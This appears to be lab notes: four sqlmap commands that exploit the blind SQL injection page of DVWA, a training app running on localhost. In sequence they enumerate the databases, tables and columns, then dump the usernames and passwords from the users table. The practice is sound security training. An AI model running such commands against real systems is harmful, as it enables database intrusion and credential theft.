sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/" --cookie="security_level=0; PHPSESSID=6d3c4eaed157f16218889a8e4ddd30a7; security=medium" --data="id=1&Submit=Submit"  --dbs --batch --risk=3 --level=3


sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/" --cookie="security_level=0; PHPSESSID=6d3c4eaed157f16218889a8e4ddd30a7; security=medium" --data="id=1&Submit=Submit"  -D dvwa --tables --batch --risk=3 --level=3

sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/" --cookie="security_level=0; PHPSESSID=6d3c4eaed157f16218889a8e4ddd30a7; security=medium" --data="id=1&Submit=Submit"  -D dvwa -T users --columns --batch --risk=3 --level=3


sqlmap -u "http://127.0.0.1/DVWA/vulnerabilities/sqli_blind/" --cookie="security_level=0; PHPSESSID=6d3c4eaed157f16218889a8e4ddd30a7; security=medium" --data="id=1&Submit=Submit"  -D dvwa -T users -C user,password --dump --batch --risk=3 --level=3


